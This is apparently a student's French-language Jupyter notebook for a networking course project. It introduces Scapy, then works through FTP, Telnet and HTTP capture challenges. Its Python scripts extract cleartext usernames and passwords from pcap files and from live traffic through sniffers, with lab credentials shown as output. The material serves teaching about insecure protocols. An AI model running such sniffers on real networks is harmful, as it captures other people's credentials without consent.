# Les bases avant de commencer

## Introduction

La **SAE 204**, dite **SAE Projet Intégratif**, a pour objectif de nous faire mobiliser de **nombreuses compétences acquises** durant notre première année. Elle s'étale sur une durée d’environ **deux mois** et se déroule en **trois phases principales**.

La **première phase** consiste à prendre en main des outils spécifiques comme **Jupyter Notebook**, qui permet de rédiger des rapports intégrant du **code Python**, et **Scapy**, un outil puissant pour **manipuler des paquets réseau** en Python.

La **deuxième phase** vise à développer une **application personnelle** en Python utilisant **Scapy**, avec un **intérêt pédagogique**. Cette application doit porter sur un point particulier des **technologies réseau**, comme un **aspect technique avancé** ou une **faille de sécurité**.

Enfin, la **troisième phase** consiste à spécifier et développer un **outil Python** permettant de **mettre en évidence** et **d'exploiter** une ou plusieurs **vulnérabilités connues** dans des **protocoles réseau**.

L’**objectif final** de cette SAE est donc de nous permettre de **maîtriser concrètement** les outils **Jupyter Notebook** et **Scapy** à travers un **projet complet** mêlant **développement**, **documentation** et **sécurité réseau**.


## Commandes d'introduction de Scapy

Pour cette SAE nous allons utiliser la bibliothèque **Scapy** pour interagir avec les interfaces et paquets réseau.

Pour commencer nous devons importer tous les modules de Scapy via `from scapy.all import *`.

In [None]:
from scapy.all import *

Une fois cela fais, nous pouvons afficher plusieurs informations liées à la configuration réseau tel que :

- La **version de Scapy** utilisée, avec le code :

In [None]:
print(f"{conf.version} est la version de Scapy.") #résultat: 2.6.1 est la version de Scapy.

- L’**interface réseau** active actuellement détectée par Scapy grâce à :

In [None]:
print(f"{conf.iface} est l'interface réseau utilisée.") #résultat: (carte RZO) est l'interface réseau utilisée.

- La commande précédente donne la référence de la carte si nous voulons afficher le **nom** de cette interface nous utilisons :

In [None]:
print(f"{conf.iface.name} est l'interface réseau utilisée.") #résultat: Ethernet est l'interface réseau utilisée.


- Pour afficher la **table de routage** associée à l’interface active, la commande sera :

In [None]:
print(f"La table de route de {conf.iface} est: \n {conf.route}") #résultat: La table de route de (carte RZO) est:


- Pour afficher la **passerelle par défaut** nous ferons la commande:

In [None]:
print(f"La passerelle par défaut de {conf.iface} est: {conf.route.route('0.0.0.0')[2]}") #résultat: La passerelle par défaut de (carte RZO) est:
#dans la commande conf.route.route('0.0.0.0')[2] le 2 correspond à l'index de la passerelle par défaut dans la table de routage. 
#L'index 0 correspond au nom de l'interface, l'index 1 a l'@IP associer, et l'index 3 à la passerelle par défaut.

***Scapy*** peut aussi faire de la **création/manipulation** de paquet pour cela il existe de commande qui nous permet certain type de paquet tel que :

- Le **paquet IP** (utilisera celle du localhost de base) sera créer avec la fonction :

In [None]:
packetIP = IP()

 - Le **paquet UDP** (vide de base) sera créer avec la fonction :

In [None]:
packetUDP = UDP()

 Une fois ces paquets créer nous pouvont nous intérrésser à l'affichage des paquets pour cela il existe **2** type de commande qui sont:
  
 - Le **résumé** du paquet est affiché via 

In [None]:
paquet1= IP()/UDP()
print(f"Le résumé du paquet est: {paquet1.summary()}")

- Le **détail complet** du paquet est affiché avec:

In [None]:
paquet1= IP()/UDP()
paquet1.show()


Enfin, le programme crée un **nouveau paquet IP/UDP** (`paquet2`) en spécifiant manuellement une **adresse IP source** (`192.168.1.1`) et une **adresse IP de destination** (`192.168.1.254`), toujours sans contenu de charge utile.

Ce programme constitue une **bonne base de prise en main de Scapy**, en explorant à la fois la configuration réseau locale et la création de paquets IP personnalisés.


## Fonction basique de ***Python***

***Python*** est un langage de programmation qui intègre de base des fonctionnalité très large et utile pour le traitement de données. Pour la suite de la **SAE** il nous faut revoir les basiques.

Pour commencer, avec ***Python*** nous pouvons créer et modifier des variables, pour cela il nous suffit juste de donner un nom à cette variable puis suivre le nom d'un "="

In [None]:
variable =

Une fois notre variable créer nous pouvons insérer des valeur dedans, ces valeurs peuvent être principalement des nombres (int), des nombres à virgule (float), du texte (str), des valeurs et des liste (list)

Pour déterminer ce que va contenir notre variable nous utilisont différent moyen.

- Pour déterminer des variables de type **int** et **float** nous devons juste suivre la valeur derrière le signe **"="**

In [None]:
Variable1 = 1 
Variable2 = 2.2

- Ensuite pour déterminer des variables de type **str** nous devons les déclarer avec `' '` ou `" "`, les guillements simple ou double définiront les valeur comme du texte.

In [None]:
Variable = 'déclarer avec guillements simples'
Variable = "déclarer avec guillements doubles"

- Enfin pour déterminer une variable comme un liste alors il faut utiliser les `[ ]`, puis séparer les valeur avec des `,` entre chaque valeur de la liste. 

In [None]:
variable = [1, 2, 3, 4, 5]

Bien sur une liste peut aussi contenir du texte pour cela il suffit juste de mettre **des guillemets**

In [None]:
variable = ['liste', 'avec', 'des', 'mots']

***Python*** possède aussi une fonctionnalité pour **ouvrir/lire/modifier** pour cela nous utilisons différentes commande python tel que :

Pour ouvrir un fichier en Python, on utilise la fonction `open()`. Cette fonction permet d'accéder au contenu d'un fichier en spécifiant le chemin du fichier ainsi que le mode d'ouverture.

Les modes d'ouverture courants sont :

- `"r"` : mode lecture (read) — pour lire le contenu du fichier.
- `"w"` : mode écriture (write) — pour écrire dans un fichier en écrasant son contenu.
- `"a"` : mode ajout (append) — pour ajouter du contenu à la fin du fichier existant.
- `"x"` : mode écriture exclusive — pour créer un fichier et écrire dedans, mais échoue si le fichier existe déjà.
- `"b"` : mode binaire — pour lire ou écrire des fichiers non textuels (images, vidéos, etc.).
- `"t"` : mode texte — mode par défaut pour lire ou écrire du texte.

voici un exemple pour ouvrir un un fichier s'appellant `text.txt` :

In [None]:
text = open("Étape 3/text.txt", "rt")
print("Voici ce que contient le fichier 'text.txt':")
print(text.read())

***Python*** nous propose d'ouvrir un fichier texte en mode lecture et de lire son contenu **ligne par ligne**.  
Il utilise la méthode `readline()` pour récupérer une ligne à la fois, ce qui permet de traiter le fichier de manière séquentielle.  

Dans cet exemple présenter, seule la première ligne est lue et affichée :

In [None]:
text = open("Étape 3/text.txt", "rt")
ligne1 = text.readline()
print("\n Voici le contenu du fichier 'text.txt' ligne 1 :")
print(ligne1)

Avec cette fonction nous pouvons lire un **certaine partie des lignes** du fichier, pour cela il suffit d'utiliser la fonction `readlines()` et ensuite afficher les éléments **comme dans une liste** tel que l'exemple ci-desssous :

In [None]:
fichier = open("etape_3/text.txt", "rt")
text= fichier.readlines()
print("\n Voici les 5 premierère ligne du fichier 'text.txt' en binaire :")
print(text[0:5])

Et ainsi ***Python*** propose d'ajouter des éléments grâce à la fonction `.write()`, une fois la commande appeller **il faut remplire les paranthèses avec le contenu** souhaiter tel que :

In [None]:
fichier = open("etape_3/text.txt", "at")
fichier.write('\n"Got it memorized ?"')

Avec les bases poser nous pouvons donc commencer à travailler sur les ***challenges FTP, Telnet et HTPP de la SAE***

# Challenge FTP

Ce challenge a pour but d'annalysée et comprendre les trames FTP

Pour commencer on importe bien évidemment la librairie "Scapy".

In [None]:
from scapy.all import *
ftp = rdpcap("ftp-total.pcapng")

## 1. Filtrage du Fichier

Pour récupérer les trames FTP on peut uttilisée les ports. FTP est uttilisée uniquement depuis les ports **20** ou **21**
On vérifie donc uniquement si le port **source** ou **destination** est le **20** ou **21**.

On tape donc en filtre sur **Wireshark**

`tcp.port == 21 or tcp.port == 20 || ftp`

Cela nous affichie bien toute les trames FTP avec les SYN, SYN/ACK et ACK

![](https://i.ibb.co/vvsNzhn4/Capture-d-cran-2025-06-01-005641.png)

Lorsque l'on regarde la capture FTP, on obtient plein d'information comme l'ip du serveur (**10.2.12.16**) ou aussi l'ip du client (**10.2.4.3**). On voit également plusieur noms de paquets comme USER, PASS, SYST, LIST et pleins d'autre.

Voici la liste de certaine de ces requêtes applicative :

* **USER** : Donne le nom d'uttilisateurs
* **PASS** : Donne le mot-de-passe
* **SYST** : Demande le système d'exploitation du serveur
* **PORT** : Les 4 premier chiffre correspondent à l'adresse ip (ici 10,2,4,3) et les deux dernier corresponde a deux chiffre P1 et P2 permetant de faire un calcul qui donnera le port (*P1 * 256 + P2*)
* **QUIT** : Permet de quitter la connexion

## 3. Extraction du fichier transféré

Dans la connexion, un fichier y est transferée. On peut le récupérée de la manière suivante :

* Allez dans `Fichier > Exporter Objet > FTP-DATA`
* Cela devrez vous ouvrir un fenêtre contenant un fichier avec comme nom **ftpdoc.odt**
* Faite `Enregistrer`

Et voilà le fichier transfèrée vous appartient !

## 4. Développement d’un “Exploit” en Python

Voici un code python qui regarde si il y a une connexion FTP qui se réalise

Ce premier code permet de récupéré nom d'uttilisateur, mot-de-passe et l'addresse ip et le port du client depuis un fichier `.pcapng`

In [None]:
import re

def parse_ftp_from_pcapng(packets):
    for pkt in packets:
        if pkt.haslayer(TCP) and (pkt[TCP].dport == 21 or pkt[TCP].sport == 21):
            if Raw in pkt:
                try:
                    payload = pkt[Raw].load.decode('utf-8', errors='ignore')
                    if "USER" in payload or "PASS" in payload:
                        if "USER" in payload:
                            user = re.search(r"USER (.+?)\r\n", payload)
                            if user:
                                print(f"Nom d'utilisateur : {user.group(1)}")
                        if "PASS" in payload:
                            passwd = re.search(r"PASS (.+?)\r\n", payload)
                            if passwd:
                                print(f"Mot de passe : {passwd.group(1)}")
                except Exception as e:
                    print("Erreur lors du traitement d’un paquet:", e)

parse_ftp_from_pcapng(ftp)


Nom d'utilisateur : touriste

Mot de passe : 3aboqphie=3qbc!

Et voici le même code que ci-dessus mais qui regarde directement dans le réseaux

In [None]:
def parse_ftp_packet(pkt):
    if pkt.haslayer(TCP) and (pkt[TCP].dport == 21 or pkt[TCP].sport == 21):
        if pkt.haslayer(Raw):
            try:
                payload = pkt[Raw].load.decode('utf-8', errors='ignore')
                if "USER" in payload or "PASS" in payload:
                    if "USER" in payload:
                        user = re.search(r"USER (.+?)\r\n", payload)
                        if user:
                            print(f"Nom d'utilisateur : {user.group(1)}")
                    if "PASS" in payload:
                        passwd = re.search(r"PASS (.+?)\r\n", payload)
                        if passwd:
                            print(f"Mot de passe : {passwd.group(1)}")
            except Exception as e:
                print("Erreur lors du traitement d’un paquet:", e)

print("Démarrage de l'écoute du trafic FTP sur le réseau...")
# sniff(filter="tcp port 21", prn=parse_ftp_packet, store=0)


# Challenge Telnet

Ce challenge a pour but d'analysée et comprendre les trames Telnet

Pour commencer, comme pour le challenge précédent on importe bien évidemment la librairie "Scapy" qui serra uttile pour les programmes Python.

In [None]:
from scapy.all import *
telnet = rdpcap("telnet-total.pcapng")

## Introduction au Telnet

Comme pour les trames FTP, Wireshark n'affiche pas toute les trames Telnet avec le nom "Telnet". Certaines sont afficher en TCP comme les SYN, SYN/ACK, ACK et FIN.

On doit donc récupérer toute les trames qui uttilise le port Telnet, soit le 23.

La commande est donc la suivante : `tcp.port == 23 || telnet`

![](https://i.ibb.co/CswFWMy9/Capture-d-cran-2025-06-01-010105.png)

## Observation des trames

Telnet fonctionne différament du FTP, ici on a pas de requêtes applicative qui nous donne a quoi correspond chaque action.

Lorsque l'on regarde la capture, on obtient plein d'information comme notament l'ip du serveur (**10.2.12.16**) ou aussi l'ip du client (**10.2.4.3**).

On peut aussi obtenir des informations sensibles en clair comme le login et mot de passe. Ce ci sont envoyée lettre par lettre car la manière dont fonctionne le telnet est que dès que l'uttilisateur tape un carractère pour le login, celui-ci est directement envoyée au serveur qui lui répond cette lettre comme une manière de lui dire qu'il a bien reçu son information.
Pour le mot-de-passe le serveur lui envoie juste un ACK pour lui prouver qu'il a bien reçu pour pas que le mot-de-passe soit récupérée 

Ainsi on peut obtenir ceci :

`login: marie`

`Password: popins`

Juste après son login l'uttilisateur reçoit certaine données du serveur comme la dernière connexion.

De plus, l'uttilisateur vas réalisée quelque commande après sa connexion. Les voici :

`ls -al`
`cat toto`
`exit`

Pour les deux première commande, celle-ci sont des commande bassique Linux. `ls - all` vas permettre de voir tout les fichier présent dans la racine sélectionnée et `cat toto` permet d'afficher le contenu du fichier toto.
La dernière commande `exit` vas arrêter la connexion telnet.

## Script Python

Après tout ce que l'on a vu, on peut réalisée un script python qui vas récupérée automatiquement dans un fichier les login et mot-de-passe d'une connexion **Telnet** :

In [None]:
def telnet_pcapng(packets):
    state = "waiting_login_prompt"
    login_buffer = ""
    password_buffer = ""

    for pkt in packets:
        if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
            payload = pkt[Raw].load.decode("utf-8", errors="ignore")
            sport = pkt[TCP].sport
            dport = pkt[TCP].dport

            if sport == 23:
                if state == "waiting_login_prompt" and "login:" in payload.lower():
                    print("Tentative de connexion Telnet")
                    state = "reading_login"
                    login_buffer = ""
                elif state == "waiting_password_prompt" and "password:" in payload.lower():
                    state = "reading_password"
                    password_buffer = ""
            elif dport == 23:
                if state == "reading_login":
                    for c in payload:
                        if c in "\r\n":
                            print(f"Login : {login_buffer}")
                            state = "waiting_password_prompt"
                            break
                        else:
                            login_buffer += c
                elif state == "reading_password":
                    for c in payload:
                        if c in "\r\n":
                            print(f"Mot de passe : {password_buffer}")
                            state = "done"
                            return
                        else:
                            password_buffer += c

telnet_pcapng(telnet)


Tentative de connexion Telnet

Login capturé : marie

Mot de passe capturé : poppins

Le fonctionnement de ce programme est très simple. On regarde toute les trames avec un port source à **23**. Si dans les données envoyée on a un "*login:*" alors on lis tout ce que le client envoie ensuite jusqu'à ce qu'il confirme son login, soit jusqu'a ce qu'il appuie sur la touche entrée, en code ce touche s'appelle "*/r/n*". On fait en suite la même chose pour le mot-de-passe est l'on récupérée donc notre login et mot-de-passe comme convenue.

A partir du code ci-dessus, on peut donc réalisée un programme sniffer qui permet de récupérée login/password d'une connexion **Telnet**.

In [None]:
def telnet_sniffer(pkt):
    global state, login_buffer, password_buffer

    if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = pkt[Raw].load.decode("utf-8", errors="ignore")
        sport = pkt[TCP].sport
        dport = pkt[TCP].dport

        if sport == 23:
            if state == "waiting_login_prompt" and "login:" in payload.lower():
                state = "reading_login"
                login_buffer = ""
            elif state == "waiting_password_prompt" and "password:" in payload.lower():
                state = "reading_password"
                password_buffer = ""
        elif dport == 23:
            if state == "reading_login":
                for c in payload:
                    if c in "\r\n":
                        print(f"Login : {login_buffer}")
                        state = "waiting_password_prompt"
                        break
                    else:
                        login_buffer += c
            elif state == "reading_password":
                for c in payload:
                    if c in "\r\n":
                        print(f"Mot de passe : {password_buffer}")
                        state = "done"
                    else:
                        password_buffer += c

state = "waiting_login_prompt"
login_buffer = ""
password_buffer = ""

print("Démarrage du sniffer Telnet...")
# sniff(filter="tcp port 23", prn=telnet_sniffer, store=False)


Voilà pour la partie **Telnet**

Il nous reste donc un dernier challenge, celui sur **HTTP**

# Challenge HTTP

Ce challenge a pour but d'analysée et comprendre les trames **HTTP** lors d'une connexion.

Pour commencer, comme pour les challenges précédent, on importe la librairie "Scapy" qui sera uttile pour les programmes Python.

In [None]:
import base64
http = rdpcap("www-total.pcapng")

## Introduction au HTTP

Comme pour les trames FTP et Telnet, Wireshark n'affiche pas toute les trames HTTP avec le nom "HTTP". Certaines sont afficher en TCP comme les SYN, SYN/ACK, ACK et FIN.

On doit donc récupérer toute les trames qui uttilise le port HTTP, soit ici le port par défault : **80**.

La commande est donc la suivante : `tcp.port == 80 || http`

![Trames](https://i.ibb.co/ksx0ckvM/Capture-d-cran-2025-06-01-010438.png)

## Observation des trames

Lorsque l'on regarde la capture, on obtient plein d'information comme notament l'ip du serveur (**10.2.12.4**) ou aussi l'ip du client (**10.2.4.3**).

On peut aussi obtenir des informations comme le login et le mot de passe de la connexion **HTTP**. Ils apparaîsent Dans la ligne "*Authorization: Basic*", plus précisément dans la sous-trames "*Credentials*" (appelée **Headers HTTP**) de la partie **HTTP** des trames.

![](https://i.ibb.co/FkFr3qfy/Capture-d-cran-2025-06-01-001335.png)



## Script Python

In [None]:
def http_pcapng(packets):
    for pkt in packets:
        if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
            payload = pkt[Raw].load.decode('utf-8', errors='ignore')
            for line in payload.split('\r\n'):
                if line.lower().startswith('authorization: basic '):
                    b64_credentials = line.split(' ', 2)[2]
                    try:
                        decoded_bytes = base64.b64decode(b64_credentials)
                        decoded_str = decoded_bytes.decode('utf-8', errors='ignore')
                        if ':' in decoded_str:
                            login, password = decoded_str.split(':', 1)
                            print(f"Login : {login}")
                            print(f"Mot de passe : {password}")
                            return
                    except Exception as e:
                        print(f"Erreur décodage : {e}")

http_pcapng(http)


Login : donald

Mot de passe : P0utine

Le code analyse chaque paquet du fichier, si celui ci est un **HTTP** alors il continue son analyse. Il regarde si dans la data il a une ligne nomée "*Authorization: Basic*". Si c'est le cas, alors il vas décodée la ligne suivante et récupérée le login et le mot-de-passe (Contenu dans le "*Credentials: login:mdp*").

Voici maintenant le script sniffer **HTTP** qui fonctionne de la même mannière que le précédent.

In [None]:
def http_sniffer(pkt):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        tcp_layer = pkt[TCP]
        if tcp_layer.dport == 80 or tcp_layer.sport == 80:
            try:
                payload = pkt[Raw].load.decode('utf-8', errors='ignore')
            except:
                return
            for line in payload.split('\r\n'):
                if line.lower().startswith('authorization: basic '):
                    b64_credentials = line.split(' ', 2)[2]
                    try:
                        decoded_bytes = base64.b64decode(b64_credentials)
                        decoded_str = decoded_bytes.decode('utf-8', errors='ignore')
                        if ':' in decoded_str:
                            login, password = decoded_str.split(':', 1)
                            print(f"Login : {login}")
                            print(f"Mot de passe : {password}")
                    except Exception as e:
                        print(f"Erreur décodage : {e}")

print("Démarrage du sniffer HTTP ...")
# sniff(filter="tcp port 80", prn=http_sniffer, store=False)


Voilà pour le **HTTP**